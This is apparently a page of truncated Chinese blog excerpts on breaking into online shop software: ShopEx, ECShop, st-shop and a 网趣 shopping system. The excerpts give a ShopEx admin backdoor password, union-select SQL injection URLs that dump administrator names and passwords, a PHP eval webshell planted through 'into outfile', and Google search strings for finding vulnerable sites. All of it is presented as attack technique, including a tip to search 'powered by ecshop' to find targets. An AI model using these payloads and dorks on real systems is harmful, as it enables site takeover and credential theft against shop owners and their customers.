shopex v4.8.5商店系统搭建的。 在网站后面加上/shopadmin/跳出网站管理后台页面。shopex v4.8.5报过一个后台万能密码漏洞。 漏洞原因： 直接看代码： public function tryLogin( $aValue, $issuper = false ) { if ( $aValue['passwd'] == “+_-_-_+” ) { $aValue['passwd'] = “”; } $sql = “SELECT * FROM sdb_operators WHERE username = ‘{$aValue['usrname']}’ AND userpass = ‘”.md5( $aValue['passwd'] ).”‘ AND disabled=’false’”; if ( $issuper ) { $sql .= ” AND super=’1′”; } return $this->d...

漏洞类型：SQL注入 漏洞描述：st-shop商城系统 v1.0程序product.asp页面可SQL注入。 功能简述： 1.最多支持3级商品分类 2.支持图片上传 3.会员管理 4.购物车系统 管理员登录地址：adminlogin.asp 初始用户名及密码：admin/888888 http://www.hackline.net/shop/product.asp?id=1624 and 1=2 union select 1,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from admin

最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后，测试后台拿shell。 本人整理给自己看的，大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、（本人测试已经失效） 系统==>数据库管理==>sql查询（可爆出物理路径）： ==============创建表失败，导不出shell====================== show databases; use 数据库名; create a(cmd text not null); insert into a(cmd) values(‘<?php eval($_POST[cmd]);?>’); select cmd from a into outfile ‘导出路径’; dro...

ShopEx网店系统销售平台，是国内最早的网店软件提供商之一；是目前国内网店系统持续研发最久的公司；是目前网店软件国内市场占有率最高的软件提供商；是目前网店软件行业内规模最大的公司。 漏洞描述：crontab.php变量未进行严格过滤，发现linux的对php exit()不会退出，继续往下执行。于是漏洞产生了。 漏洞代码： \core\include_v5\crontab.php zend加密后的，我只发布解密后的代码。 public function run( ) { $this->logFile = HOME_DIR.”/logs/access.log.php”; $this->now = time( ); $this->viewS...

而这个漏洞呢，暂时是可以说是通杀ecshop的。 如果你没有目标网站，可以google上搜索:powered by ecshop 就可以找到一大堆ecshop的网站 这个时候在其网址后输入病毒代码即可以爆出该站的管理员账户密码 普通代码:”user.php?act=order_query&order_sn=’ union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*” 而有些网站会针对这个问题作出些修复等等,所以这个普通代码的成功率现在已经不是那么高了.如果普通代码不行,不着急,还有个变种代码 变种代...

网趣网上购物系统时尚版10.3在会员登录编辑订单处存在SQL注入，导致管理员密码被注入暴MD5漏洞。 漏洞:文件editorderform.asp，存在sql注入漏洞 关键字：inurl:trends.asp?id= 利用前提：注册用户下定单 分析： 源码如下： <%dim zhuangtai,namekey namekey=trim(request(“namekey”))      只是单单过滤了空格而已 zhuangtai=trim(request(“zhuangtai”)) if zhuangtai=”" then zhuangtai=request.QueryString(“zhuangtai”) if namekey=”" then namekey=request.querystring(“namekey”) %> ……………… ‘//...